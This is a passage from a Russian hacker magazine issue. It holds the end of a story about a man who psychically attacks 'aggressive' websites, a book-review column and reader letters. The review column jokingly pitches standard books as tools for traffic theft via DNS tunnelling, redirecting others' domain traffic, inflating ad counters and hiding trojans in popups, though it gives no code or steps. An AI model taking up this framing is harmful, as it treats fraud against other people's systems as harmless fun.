И на вторые сутки борьбы с болью я поднялся с дивана и шаткой от голода походкой подошел к компьютеру. Тогда я не задумался над тем, что будет, если через несколько минут история с Lib.ru повторится на каком-нибудь другом сайте. Смогу ли я пережить еще один подобный приступ? Да еще в том состоянии, в каком находился, - с шумящей от слабости головой, с дрожащими руками и ногами?

Я не стал утруждать себя поисками ответов на эти вопросы. Я просто включил компьютер и зашел на Rambler.

Ничего не произошло. Я потыкался мышкой в разные ссылки, просмотрел равнодушным взглядом новости со всего мира; чувство голода победило и подтолкнуло меня к холодильнику. Несколько бутербродов вернули меня к жизни; я вновь опустился в кресло...

И тут же увидел то, что искал. Светящуюся ссылку. «Жертвы Кавказской войны...» Клик.

Ничего особенного. Новости как новости. Еще несколько человек вернулось из плена; стоит порадоваться за людей, вновь обретших свободу... Я разочарованно хмыкнул; не такой реакции ожидал я, открывая «меченую ссылку». А потом я вдруг отчетливо увидел перед собой неприметный грязно-белый «Жигуленок», медленно тащившийся вдоль какого-то московского переулка. Человек, сидящий за рулем автомобиля, внимательно разглядывал шедшего по тротуару мужчину, периодически бросая взгляд на сиденье рядом, где лежали веревка и пистолет. Губы его невнятно шевелились; артикуляция была явно не похожа на русскую.

Во весь экран моего компьютера всплыл из глубин пространства номер «Жигулей». И тут же мой левый висок ожил.

Конечно же, я ждал чего-то подобного. Кое-что я даже угадал - а именно интенсивность боли. Я просто чувствовал, что та сила, которая взламывала мое сознание в первый раз, больше не будет проявлять себя с прежней интенсивностью - она уже обрела в моем лице союзника, пусть невольного. Толчок был несильным, но властным.

Я еще не знал, что делаю. Но уже чувствовал, что не могу остановиться.

Снова голубым сверкнул телефонный провод. Снова сквозь меня прошла струна магнитного резонанса.


Спецвыпуск Xakep, номер #029, стр. 029-116-14, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-14

Когда я открыл глаза, передо мной на экране была база данных московского ГИБДД по машинам, находящимся в угоне. Окно регистрации было услужливо распахнуто. И я ввел номер «Жигуленка»...

Мягкий толчок. Судя по всему, это было что-то вроде благодарности.

Выключив компьютер, я отошел к дивану и прилег. Сил хватило только на то, чтобы не закрывать глаза. Я смотрел прямо перед собой в потолок и думал, думал...

В первый раз, когда я наткнулся на рассказ отвратительного содержания, Интернет показал мне причину. Во второй раз - во время готовящегося похищения человека - следствие. И в обоих случаях я сумел нарушить причинно-следственную связь.

Тогда я задумался над пониманием процессов, протекающих в Сети. Она была идеальным средством влияния - и от количества агрессивной информации, проходящей через провода в единицу времени, зависело наше с вами благополучие.

И тогда впервые в моей голове возникло желание ПРОДОЛЖАТЬ. Оглядываясь назад, я понимаю, что случилось это именно после второго эпизода, когда я, вставая из-за компьютера, увидел, как на выезде из города «Жигуленок» был задержан, связанного человека вытащили из багажника, а убегающего похитителя, так и не сумевшего довести свой груз до Северного Кавказа, застрелили.

Подойдя к зеркалу, я взглянул на себя критически. Мое отражение несло на себе печать обреченности. В настоящий момент я был не способен ни на что другое, кроме как швырять энергию своей боли в телефонные провода. Криво улыбнувшись, я кивнул сам себе, выпил таблетку и снова сел за компьютер...

5.

«Я получил эту роль, мне выпал счастливый билет...»

Вот только счастьем здесь и не пахло.

Каждый день я выходил в Интернет, как на работу. Я вбирал в себя такой объем негативной информации, что он казался просто нереальным. Пламенеющие размазанные ссылки, которые моя пуля мягко, но требовательно показывала мне (к тому времени я уже так и называл ее - «моя пуля»), - их количество росло прямо на глазах. Мне было непонятно - то ли вначале мои мозги проходили некую тренировку, то ли я сам постепенно учился обнаруживать их.

Когда впервые я понял, что выключить комп, не уничтожив все «агрессивные ссылки» (этот термин я тоже придумал сам), невозможно - на короткий период мне стало страшно. В тот день я увидел на одной странице новостного сайта сразу три подобных линка. Пройдя сквозь два из них (не буду вдаваться в подробности, но обе они несли разрушительное влияние на детскую психику, накачивая их мозги порнографией), я почувствовал такую слабость, что решил пренебречь оставшейся - на нее у меня просто не хватало сил. Но отойти от компьютера, а тем более выключить его не удалось - резонатор в левом виске устроил мне такую бурю, что я невольно упал обратно в кресло и, не задумываясь, потратил последние в тот день нервные клетки на уничтожение третьего линка. Только после этого мой свинцовый сторож смилостивился надо мной и позволил доползти до дивана. Проваливаясь в сон, я видел перед собой тихо шелестящий, почему-то прозрачный винчестер, на котором превращался в ничто один из сайтов русских фашистов...


Спецвыпуск Xakep, номер #029, стр. 029-116-15, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-15

Судя по всему, я объявил войну Интернету - или он объявил войну мне. Тот уровень, на котором я «работал» в первое время, постепенно уступал место новому - «уровню агрессии». Вообще, у меня появилось много новых терминов, сопровождающих меня в моей новой жизни, и «уровень агрессии» - один из самых удачных.

Вначале я установил пятибалльную шкалу для этого уровня - но уж очень разношерстной оказалась вся та гадость, с которой мне приходилось бороться, пришлось развернуть ее в десять баллов, а потом в сто. К счастью, ссылок, ведущих на уровень, близкий хотя бы к «пятидесятому», мне еще не встречалось (я просто понимал, что еще многого не могу себе вообразить, поэтому на всякий случай развернул свою шкалу с запасом).

Постепенно я обретал опыт. Сами понимаете, вещь немаловажная. В первую очередь я учился спасать самого себя; у меня выработался комплекс мероприятий по выходу из жутко разбитых состояний, следовавших за каждой моей победой; я овладел йогой, занимался аутотренингом. Поняв, что этот этап я прошел, я принялся более тщательно всматриваться в происходящее на экране.

Тот клубок нервных клеток, опутавший пулю, каким-то непостижимым образом трансформировал негативную информацию, что несли в себе документы, на которые указывали «меченые» ссылки. Не сразу я научился отличать цвет сияния линка в зависимости от того, что за ним скрывается; не сразу научился планировать свой серфинг. Пока я не разобрался в том, что оранжевое сияние указывает на сексуальные преступления, голубое - на преступления против личности, салатовое - на явления расизма и шовинизма, пока я не выстроил для себя четкую схему этих отличий, я бездумно хватался за первую попавшуюся «агрессивную ссылку», пытаясь блокировать и ее саму, и тот процесс, что она запускала в людях, прошедших по ней.

Очень скоро выяснилось, что некоторые проблемы я решал с минимальной затратой сил - например, форматирование винчестеров на порносерверах. Другие же незримые схватки с потоками агрессивной информации решались с большим трудом (особенно проблемы религиозной нетерпимости - пару раз столкнувшись с тем, как на исламских сайтах, проповедавших джихад, мои магнитные бури наталкивались на противостояние всего мусульманского менталитета, я стал осторожнее и готовился к подобным воздействиям достаточно долго).

Мне кажется, что у вас может сложиться впечатление, будто я каким-то образом мог планировать свою «работу». Это не так. Я был зависим от нее на все двести процентов; я был подчинен ей и не мог от нее избавиться. Она покорила меня; но и я не оставался в долгу. Каждое мое погружение в Сеть наносило точный удар - а потом, лежа на полу возле компа и не имея сил подняться, я просил судьбу отнять у меня мой страшный дар. Я заглядывал в эту бездну и понимал, что уже не могу остановиться.

Иногда я мечтал о том, что «моя пуля» сможет явить мне обратную сторону Интернета - я смогу видеть ссылки, несущие исключительно положительную информацию, смогу получать от них некую подпитку моей расшатанной нервной системе, просто смогу продержаться на плаву хоть чуть-чуть дольше. Но ничего подобного не происходило. Оставалось надеяться на то, что все, что я делаю, - некое божественное предназначение. И это стало еще одним этапом моей жизни.


Спецвыпуск Xakep, номер #029, стр. 029-116-16, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-16

Религия. Вера. Любовь к жизни и людям, которых защищал мой дар.

Я проникся этими составляющими; я хотел бы донести их до вас. Но смыслом моей жизни стала борьба с «уровнем агрессии». Я создал свой собственный «versus» - я и Сеть. Вы знаете, как порой бывает необходимо назвать все своими именами - чтобы после этого все цели были четко и однозначно обозначены.

ИНТЕРНЕТ - СУЩЕСТВО АГРЕССИВНОЕ.

С этого я начинал наш разговор. Я думаю, что теперь вы согласны со мной. Но это еще не окончание моего монолога.

Мне очень хочется верить в то, что где-то есть и другой полюс проблемы; что есть человек, подобный мне - но управляющий позитивной информацией, способной сделать человека чище, добрее, возвышеннее... Я пытался отправить ему некое подобие импульса, просящего о встрече, - но, видимо, я не так хорошо умею распоряжаться своим «талантом»; ответа не было.

Не думайте, что у меня все так безоблачно - что каждый заход заканчивается отсечением еще одного щупальца у монстроподобного Интернета. Периодически и я терплю поражения; иногда они бывают очень жестокими. Интернет начал мстить мне. Он стал отчаянно сопротивляться. В такие дни у меня опускались руки.

Когда в небе над Америкой семеро астронавтов сгорели в «Колумбии», я напился. Вообще я редко это делаю, но тогда... Пришлось отдать должное Интернету, вытолкнувшему меня из центра НАСА при помощи какой-то защитной программы; я просто не успел войти в Сеть снова. Тогда я стал осторожнее, установил себе выделенную линию, чтобы не тратить время на дозвон, - но и это не помогло мне; судя по всему, ответы Сети стали ожесточеннее, точнее; я вываливался из Интернета, не выполнив своей миссии, два раза из пяти. Высокий процент, учитывая последствия для организма.

Мне приходилось приспосабливаться. Это было что-то вроде мимикрии. Я маскировал свои атаки; иногда я специально просматривал несколько обычных ссылок вокруг одной «агрессивной», подготавливая себя к тому, что предстоит пережить, кликнув по ней. Можете сказать, что у меня паранойя; и я не смогу ничего ответить вам на это - я общался с Интернетом, как с живым, хотя понимал, что никаким разумом там и не пахнет.

Постепенно я пришел к выводу, что это перестало быть моим наказанием, превратившись в работу. Я ходил на эту работу ежедневно и проводил на ней нелимитированное время. Чтобы оплачивать свой трафик, я в течение часа в день собирал некую новостную ленту для сайта провайдера, за что имел анлимит по символической цене. Если бы не это, я давно бы продал с себя последние штаны - мои атаки непостижимым образом пропускали через сервер провайдера многомегабайтный трафик, несмотря на кратковременность воздействия.

Помните, в начале нашего разговора я упомянул о шизофрениках и их восьми процентах нервных клеток, участвующих в анализе и синтезе информации? Недавно я пришел к выводу, что мои мозги, формируя свои собственные магнитные бури и выплескивая их в провода, давно уже откололи от своего узкого горлышка намного больше половины. Ко мне в сознание вместе с той чертовой пулей хлынула куча всякой гадости; конечно же, я не мечтал ни о чем подобном; конечно же, я оказался не готов - но это только в начале пути. С каждым днем я все больше и больше обретал уверенность...


Спецвыпуск Xakep, номер #029, стр. 029-116-17, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-17

Хуже всего оказалось другое, поначалу незамеченное. Не вдаваясь в подробности, скажу - уровень агрессии растет; я не в состоянии угнаться за ним.

На экране моего монитора поместился слишком маленький кусочек глобального кошмара, называемого Всемирной паутиной.

К сожалению для всех вас, к счастью для меня - «агрессивные ссылки» не нужно искать, они всегда рядом. Сквозь пламя букв я вижу все то, чем нас пугают Спилберг и Верховен, Бредбери и Кинг; я вижу кадры из «Армагеддона», «Писем мертвого человека» и «Эпидемии»; я вижу пороки, гнев, ненависть, я пропускаю все это сквозь себя, чтобы, не дай бог, не ошибиться - хотя мои молнии, сверкающие в левом виске, еще ни разу не ошиблись.

Мой организм тает, как свеча. Я - как тот негр-великан из «Зеленой мили»; я хочу помочь всем, но мне не хватит и десяти жизней на это - и поэтому я хочу умереть. Наверное, я уже подсел на «Солпадеин» - недавно прочитал на упаковке, что в его состав входит кодеин (а я-то думаю - что мне так хочется его выпить, даже если голова не болит?)

Вы, наверное, думаете, что все, о чем здесь шла речь - бред воспаленного рассудка? Спешу вас огорчить. От первого до последнего слова здесь все - правда. Но я не сказал пока самого главного - почему я решил поведать все вам, читающим сейчас это электронное письмо, отправленное по спам-листу сразу двумстам тысячам человек (и даже, наверное, немного больше).

Этот текст - своего рода доказательство того, что я существую. Что-то вроде завещания. Пришла пора написать его, ибо вчера вечером случилось то, о чем я всегда втайне размышлял и всегда боялся встречи с этим.

Вчера вечером впервые пуля толкнула меня в висок, когда компьютер был выключен. Такого не было никогда. Я расценил это как приказ. Я вообще не привык с ней спорить.

Когда я включил свою машину, то понял, что пути назад нет. Пуля не отпустит меня, пока я не закончу работу - или пока не умру. Причем второй вариант был предпочтительнее, потому что...

Потому что на рабочем столе моей Windows Longhorn пламенел розовым светом значок Интернета. Уровень агрессии превысил все допустимые нормы - и выплеснулся через край. Вся Сеть была захвачена; вокруг меня сгустился воздух, провод выделенки засветился голубым светом (как меч Бильбо Бэггинса - «Рядом орки!»)...

Прежде чем кликнуть по значку, я написал это письмо. Компьютер и пуля все равно не позволят мне уйти - поэтому я потратил почти всю ночь и написал так подробно. Боюсь, второй попытки не будет. (Тут должен был быть «грустный» смайлик - а я так и не научился их ставить.)


Спецвыпуск Xakep, номер #029, стр. 029-116-18, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-18

Сейчас я отправлю письмо и... И до чего же я люблю многоточия...

P.S. Если получится, передайте привет тому парню, что вышиб мне мозги.

Благодаря ему вы все еще живы...


Спецвыпуск Xakep, номер #029, стр. 029-124-1, Буки для начинающего веб-мошенника

Буки для начинающего веб-мошенника

Frozen (frozen@real.xakep.ru)

Спецвыпуск Xakep, номер #029, стр. 029-124-1

Пришла весна, птички запели и так хорошо становится :), что летать охота - (с) by Водяной. И хочется чего-нибудь эдакое совершить, глобально-мощное... Совершить что-то хорошее-хорошее (ага, чтобы всем вокруг стало плохо). Эх, рука так и тянется сделать заподлянку ближнему своему... Ну что ж, вперед, к победе коммунизма, как любил говаривать дедушка Ленин...

П. Альбитц. DNS и BIND. - М. Издательство СИМВОЛ-ПЛЮС, 2002 г. - 690 c.

Извечной проблемой является поиск халявного Инета, и если ты сидишь в локалке, то особо остро стоит вопрос с траффиком... Но, как правило, есть внутрисетевой DNS-сервер, доступ к которому осуществляется быстро и без ненужных затрат на запросы. Ты же ведь всегда мечтал устроить туннелирование через этот самый сервак и абсолютно for free качать, качать и качать варез, мп3шки или еще что для души :). Или представь - зарегил твой знакомый себе домен, создал прикольный дизигн, и толпа народа ежедневно тусуется на его паге, а ты никак не можешь раскрутиться и ощутить все прелести от накрутки рекламы... Опять же есть интересный выход - просто перенаправлять все запросы к нему на свой сайт :). В общем, со службой DNS можно много всего придумать, а полностью изучить и освоить все тонкости доменной системы имен тебе поможет эта книга. Этот, так сказать, талмуд стал своего рода библией для системного админа, потому что абсолютно полное содержание и особый авторский стиль, и доступный способ изложения делают книгу незаменимой и актуальной для каждого, кто хочет наладить эффективную работу DNS. Рассматривается множество полезной и актуальной информации, начиная с функциональности и принципов работы и заканчивая главами вроде "Обеспечение безопасности DNS". И как небольшой бонус можно выявить инфу про программирование для ДНС на перле, в общем книга нужная и полезная, так как большинство DNS-серваков в Инете работают именно под управление BIND'а.

Рекомендовано: всем и обязательно.

Б. Сандерс. Эффективная работа: Flash 5. - М. Издательство "Питер", 2001 г. - 352 c.

Ты, наверняка, знаешь, что такое Flash и то, что в мультик можно вставлять свои скрипты (ну, собственно, без этого нормального клипа и не сделать). А ведь с каждой новой версией язык программирования, встроенный во флэш, ширится и набирает обороты, обзаводясь новыми возможностями и прочими примочками. В этой буке тебе расскажут, на мой взгляд, о самой лучшей программе создания векторной анимации - Macromedia Flash. Здесь ты найдешь описание возможностей этого монстра и просто огромное количество примеров по созданию профессиональной анимации. Рассмотрены особенности опубликования флэш-фильмов в Интернете и на компакт-дисках, разработка интерактивного интерфейса и многое другое... Но сегодня у нас другая задача - смонстрячить что-нибудь, с помощью чего можно будет "слегка" обхитрить соседа :)). И в этом качестве флэш сгодится, скажу я тебе, возьми и посмотри, сколько новых возможностей предоставляет язык ActionScript. Но рассказывать обо всем этом - не моя задача, а я предлагаю тебе ознакомиться с этой литературой, которую ну никак нельзя упускать из виду. И изучив всю представленную (кстати говоря, очень грамотно и понятно) здесь информацию, ты без труда сделаешь шедевр рекламной мысли, встроив внутрь небольшой скриптик, который будет накручивать счетчики на твоем варез-сайте :). Ну и остается добавить только, что к книге прилагается компакт-диск со всеми необходимыми приложениями, файлы поддержки и примеры, нужные для выполнения практических заданий.


Спецвыпуск Xakep, номер #029, стр. 029-124-2, Буки для начинающего веб-мошенника

Буки для начинающего веб-мошенника

Frozen (frozen@real.xakep.ru)

Спецвыпуск Xakep, номер #029, стр. 029-124-2

Рекомендовано: флэш-заподлянщикам :).

А. Матросов. HTML 4.0 в подлиннике. - СПб. Издательство "BHV-СПб", 2000 г. - 672 с.

"Ну зачем мне эта книга? - спросишь ты меня. - Номер для ньюби был уже". Хех, во-первых, повторение - как известно, мать учения :), закрепляем знания, так сказать; а во-вторых, на этот раз даже такая простая, на первый взгляд, бука пригодится для создания паги с хитрым скриптом внутрях :). Ты, наверное, не раз заходил на кряко-варезно-порнушные сайты с кучей попапов, вылетающих там и тут. Да и на свой сайт, ты наверное, уже повесил парочку, но ведь ты же не сам кодил вылезание окон, ведь гораздо проще с файлового архива скачать примерчик и подставить туда свои параметры. А представь, что кодер и сам засунул туда немного вредоносный код... Что-то вроде трояна в трояне :). Ну так вот, без знания языка, на котором написан этот скрипт, ты далеко не уедешь :), а для грамотного изучения уже готового исходника или если вдруг ты решишь создать свой скрипт под свои нужды :) пригодится тебе вот эта книженция. Здесь рассмотрено создание сценариев на языках JavaScript и VBScript и объектно-ориентированные технологии и программирование на языке Perl, а также создание CGI-программ. Приводится довольно большое количество сведений о браузерах Netscape Communicator и Microsoft Internet Explorer, и, плюс ко всему, есть огромная таблица HTML-тэгов. А особо меня заинтересовала глава "Совместимость приводов CD-ROM и программ для вычленения звуковых файлов"... Уж и не знаю, зачем она здесь нужна, но зато это можно отметить в качестве бонуса :).

Рекомендовано: всем кодерам паг.

Гудман Дэнни. JavaScript. Библия пользователя (+ CD-ROM). - М. Издательство Вильямс - Диалектика, 2002 г. - 960 с.

Да, но все-таки предыдущая книга представляет собой что-то типа сборной солянки из кучи информации по разным темам, а вот конкретно этот экземпляр позволит тебе разобраться абсолютно во всех тонкостях изучаемого предмета (а конкретно - языка программирования JavaScript). Да, разберешься ты так, что будешь просто бить фонтаном фундаментальных знаний и, может, даже станешь довольно опытным программером. Но не думай, что раз такой размер буки, то и инфа там сложная и неперевариваемая; в общем-то, "книга рассчитана на самый широкий круг Web-дизайнеров, которые решили освоить язык JavaScript или углубить свои знания в этой области". И по признанию издательства, "имеет все шансы завоевать титул полного справочного руководства по JavaScript не только в умах разработчиков, но и в сердцах пользователей". Конечно, и сам объем книги предполагает самое наидетальнейшее рассмотрение наверное всех средств разработки сценариев JavaScript, которые применяются как в современных, так и в уже устаревших браузерах. Продвижение материала начинается с истории и особенности JS, а заканчивается рассмотрением сложных приложений, которые используются для выполнения довольно серьезных и сложных задач. А особое внимание в книге уделено созданию скриптов, которые будут работать на большинстве существующих сегодня браузеров.


Спецвыпуск Xakep, номер #029, стр. 029-124-3, Буки для начинающего веб-мошенника

Буки для начинающего веб-мошенника

Frozen (frozen@real.xakep.ru)

Спецвыпуск Xakep, номер #029, стр. 029-124-3

Рекомендовано: если ты всерьез запарился с изучением JS, то советую обратить внимание на эту буку.

Брайан Таймэн, Майкл Эбен. FreeBSD, Энциклопедия пользователя. - М. Издательство ДиаСофт, 2002 г. - 736 с.

Для тебя, надеюсь, не является секретом, что большинство серваков в современном Инете стоит под управлением одной из самых защищенных и шустрых осей - FreeBSD. Количество взломов этой системы по всяким разным источникам не превышает и 3%. Однако, если ты собрался более-менее нормально изучить структуру и работу различных серверов, то без знания внутреннего устройства операционки, под которой крутится сервак, на мой взгляд, не очень-то и получится. Да и потом многие вещи (вроде быстрой смены айпишника и MAС) позволяют выполнять только *nixоподобные машины. А потом все-таки знание чего-то кроме выньдовса морально поднимет тебя над соплеменниками - обычными пользователями :). В данной книге подробно рассказано об инсталляции системы, управлении загрузкой, конфигурировании системы X-Window и важнейших пользовательских сервисах. Также предоставляется описание функциональных возможностей FreeBSD, в том числе методика настройки и сборки ядра. Освещаются вопросы по подключение к Internet, защите сетей и совместном использовании ресурсов. Ну и, в дополнение ко всему, будет служить отличным справочником по настройке серверов Apache, Samba и DNS.

Рекомендовано: для людей, осваивающих построение серверов на BSDе.

Редакция выражает благодарность магазину "Библио-Глобус" за предоставленные книги.


Спецвыпуск Xakep, номер #029, стр. 029-126-1,

From: Hostein (Hostein@yandex.ru)

Subject: Идея

Респектыч!!Спец!

Я сразу забью на приветствие, так как вы, наверно, уже заколебались читать всякие похвалы и лестные отзывы о вашем журнале.

Давно хотел вам сказать, что вам пора создать свой сайт!!!! Уже надоело заходить на СРОЩЕНный сайт хакера. У вас уже много опыта, и в принципе вы можете создать обалденный сайт... подумайте...

P.Z. Niro убирать не надо, но когда он пишет фантастику-будущее с американскими именами, очень тяжело читать рассказ. Пусть лучше пишет про наших хакеров...

P.Z.Z. Последний комикс Грифа - посто класс!!!

Пока...

To: Hostein (Hostein@yandex.ru)

Мегапррривет!

Такого тонкого намека на нашу рулезность я еще не видел... Черт подери, заколебаться читать похвалы - это даже круче, чем умереть от оргазма :). Ну ладно, это мы завсегда успеем :))).

По поводу сайта Спеца - в те давние времена, когда я только пришел в журнал и осваивал азы камасутры с редакторами, эта идея уже витала в воздухе. И если бы у нее хватило сил материализоваться, ты, наверно, никогда бы не прочел моих ответов на твои письма, ибо я по идее должен был лабать дизигн и принимать обличие вебмастера :). Кстати, заготовки дизигна так и лежат у меня на хоумпаге в директории "/spez", кому интересно - велкам :). Ну а пока сайт Спеца не появился (пока!), можешь навестить воскресший из мертвых http://winfo.org. Из сайта рубрики WINformation он постепенно преображается в подобие Спецового портала. По крайней мере в форуме иногда возникают совсем не виндовые диалоги :).

Кстати, только что дал Ниро СПЕЦзадание - русифицировать все имена в стори. Так что готовься к приходу Бульбы Сумкина и прочих Электродрелей. Гоблин форева, ламоботы маздай. Все.

From: GMBerkut (gmberkut@atom.ru)

Subject: Ну вот ща я зуплачу! =]

Даров, Спец! Я, конечно, присоединяюсь ко всем, кто кричит, мол, читаю вас с пеленок (им, видимо, лет по... 2), я вас читаю с год-полтора, обычно покупал каждый выпуск, но в этом за февраль не удалось. Так фишка в том, что в мартовском Спеце в разделе E-MAIL появились письма, аналогичные которым встречались в Х много лет =) назад! И вроде и письма-то не особо блещут оригинальностью, но меня поразило другое, что вы все равно опубликовали их! Вот этим мне в принципе Х и не нравится, что в нем нет больше просто писем, обычных писем радости! Или там Центнер совсем "от рук отбился", или просто народ стал писать не для того, чтобы сказать пару слов любимому журналу, а чтобы появиться в рубрике е-майл! Ну вот куда это годится??? Когда все знают, если я не напишу что-то сверхуникальное, то меня не прочтут!

Я никогда не думал вам писать. Пару раз отправил письма в Х, но и все равно! =( Я их даже с юбилеем поздравил, а они... =``( Вот я как раз дошел до плача! =] Короче, молодцы, ребята! Нельзя зацикливаться на супер-ориджинал письмах, нужно быть ближе к людям! Вы хоть бы тем, что уже давно выпускаетесь каждый месяц, стали ближе к нам, простым смертным читателям!

Всех благ и пива вам много!

To: GMBerkut (gmberkut@atom.ru)

Мафака, Беркут, что ж ты делаешь? Носовой платок и тазик в студию, а то ведь затопит, мерзавец :))).


Спецвыпуск Xakep, номер #029, стр. 029-126-2,

Я вот сижу и совершенно не знаю, что ж тебе такое ответить... Если скажу, что да, мол, мы публикуем все подряд - нас завалят письмами, состоящими из одного сабжа :). А если скажу, что нет, ни фига, давайте, мля, мне нестандартный подход и письма в хексах - то и кучу народа обижу, и с духом журнала вразрез пойду... Что ни говори, а простые письма (которые ты очень здорово обозвал "письмами радости"), известные в узких кругах как "банальный фидбэк", являются для нас особым видом энергии. То есть чувак, который не просит халявы, не вносит умных мыслей на тему "бей комикс - спасай Спец" и не заставляет нас вчитываться в безграмотный текст, просто-напросто заряжает аккумуляторы редакторов на пару-тройку делений :). А уж потом мы, как кролики с батарейкой в заднице, начинаем безбожно пинать авторов и выбивать из них интересные материалы, которые ты впоследствии прочитаешь, пропрешься и напишешь нам очередное письмо радости. Дядька Эйнштейн был прав - вот он, закон сохранения энергии в чистом виде. А чтобы тебе не было обломно ждать статей в разряженном состоянии (в тот момент, когда твою энергию юзаем мы :)), получай-ка ты TheBat! Может, он децл скрасит твои дни от зарядки до зарядки... :).

From: Lisa (irrrka@mail.ru)

Subject: Пысьмо (типа)

Мир вашему компутеру, spec!

Эх, и зачем я только купила этот номер Спеца! %) После прочтения всего номера ощущаешь стойкую образовавшуюся зависимость, можно даже сказать - жизненную необходимость... в последующих номерах. А также потребность бежать со всех ног на "Савеловский" и купить все пропущенные выпуски %). Но при попытке прикрутить устройство "Хакер" - устройство "Карман" начинает конфликтовать, сбоить и всячески выражает свое возмущение :). Так что приходится довольствоваться вожделенным Хакером раз этак в 3 месяца и сдерживать души порывы %). Но это была, так сказать, интерлюдия, а далее - замечания :) Не посчитайте занудой, но для издания такого класса в текстах бросается в глаза слишком много орфографических ошибок (срывая с головы академическую ермолку и прикрываясь ею от тухлых яиц и гнилых помидоров :)))

[феминистские наезды поскипаны злобным Дроничем].

До следующего свидания с Хакером... месяца через три посмотрим крЫтическим взглядом :)

Спасибо вам за то, что вы есть.

* Список найденных орфобагов могу прислать по запросу ;).

** Хотя составлять лень %).

To: Lisa (irrrka@mail.ru)

Ой, Лиза-Ирка, что-то я тебя не пойму...

То хвалишь, то за орфографию ругаешь. Второе, кстати, странно, ибо с декабря прошлого года в составе Спеца действует оперативная группа баготравителей, возглавляемая ни кем иным, как Донором. Я думаю, в новогоднем Спеце ты видела его в униформе :). Так вот, если верить их отчетам, багов в последних номерах не замечено. Срочно бори свою лень и лабай нам списочек - найдем и вытравим незамедлительно. И вообще - записывайся к нам в бета-тестеры - женский крЫтический взгляд необходим нам ежемесячно. Заодно и карман тебе переустановим - бета-тестерам Спец подключается бесконфликтно по FireWire. Пиши.


Спецвыпуск Xakep, номер #029, стр. 029-126-3,

From: coolcat (coolcat@tut.by)

Subject: no topic

Мда, мда, мда...

Смотрю я Спец за 12(25)2002 (сорри, более нового нет) и говорю, что без слез, изжоги и рвоты смотреть на 1/2 статей нельзя. Описалово взлома вроде есть, а вроде нет. Если вы называете взломом запуск MMC с помощью DebPloit'а или впаривание трояна под видом твикера, то что тогда ламерство? Или вы хотите сказать, что любой, кто пришел в клуб, получил права админа с помощью чужой утилиты уже "кул хацкер"? Как угнать красивый номер ICQ. Кто, кроме ламеров, юзает ICQ?! Ладно, хватит о плохом. Если так подумать, то все не так уж плохо. Вас читают, и это один из показателей успеха. Есть только один совет, не заводите второго Даню Шеповалова!!! Если в Спеце оное чудо появится, то все, виллы. Да, кстати, что-нибудь нормальное про взлом будет?

To: coolcat (coolcat@tut.by)

Кис-кис-кис!

Ну, крутой_кот, я тебя поздравляю. Ты, типа, лажанулся или где? Взял, значит, Спец "Легкий Хак" и говоришь, что, типа, хак какой-то легкий :). Что за фигня? Или ты просто проморгал серию по взлому? Могу сказать только, что "нормальное по взлому" было недавно и в большом количестве, советую почитать, благо инфа еще не устарела. Хотя скоро будет еще, так что натачивай свою наезжалку - будешь, типа, критиковать, а мы, типа, прислушиваться. И делать Спец лучше.

From: Дмитрий (dmitri@cbuilder.ru)

Subject: ][-Спец есть не то, что он есть, а есть то, что он не есть ;) ([C] Марсель)

Доровеньки булы, уважаемые! Прежде всего хочу вас всех поблагодарить за новые, _интересные_, информативные Спецы [while(1) cout<<"Thanks to Spec-crew! C++ forever ;)" ;]. Началось все с того, что однажды, возвращаясь домой поздним январским вечером, увидел октябрьский (!) ][-Спец в киоске. Спецы давно не покупал, а тут меня озарило (инсайт inside ;), и я отслюнявил 100 каких-то бумажек продавцу. Пошел домой... залпом прочитал замечательные статьи Дронича, aDm'а и проч. и проч. Потом побежал за ноябрьским спецом, прочитал, не отходя от кассы. Супер! Затем захотелось почитать Спец про дефейс, но на дворе-то январь (к слову), а нужен сентябрьский Спец. Все-таки достал и его, прочитал, еще не открывая ;). Вообще-то, я - программер и до сих пор взломом не интересовался, но после серии Спецов по взлому хоть немного просветился.

Только хотел было вам написать предложение про Спец по Web-design'у, как смотрю - в киоске "Хакер Спец - Web пага-робот". Еклмн! Купил и его ;).

В общем, что я хочу сказать: ребята, спасибо вам за интересные и полезные выпуски, так держать! Не слушайте тех, кто говорит, что писать надо проще и для ламаков, для них свои журналы есть. А вы пишите еще круче, побольше исходников, народ требует не руководство по phpBB, переведенное с англ. ;), а сорцов своего форума, вот тогда будет еще лучше и полезнее! Спасибо вам! И с наступающим вас всех (в смысле, ДР)! Всего хорошего!

P.S. Все-таки больше исходников, господа! Предлагаю пятый номер Спеца только про написание своих скриптов. Ежели чего - пишите, я обязательно что-нибудь нацарапаю на эту тему (Если Bat! к тому времени не скажет "30 days have expired...").


Спецвыпуск Xakep, номер #029, стр. 029-126-4,

To: Дмитрий (dmitri@cbuilder.ru)

Ха-ха-ха!

Вот и еще одна жертва нашего бесчеловечного эксперимента над людьми! На самом деле партия октябрьских Спецов была заряжена лично Чумаком, Кашпировским и Копперфильдом и выброшена в свободную продажу. С тех пор ни один программер, проходя мимо киоска, не может оторвать взгляд от обложки. А потом его мозг подрубается к нашей гиперличностной матрице, и мы начинаем паразитировать на нем, собирая потенциальные темы номеров непосредственно из голов читателей. Вот такие мы жестокие челы :).

Ну, раз уж ты теперь все знаешь, скажу - на самом деле Пингвинов уже знал про то, что если ты прочитаешь перевод мануала phpBB, то обязательно напишешь нам. Так что все было с санкций начальства, не переживай. А пока осмысливай свою новую жизнь в обнимку с молчаливой летучей мышью, которая никогда не скажет ничего про злосчастные тридцать дней...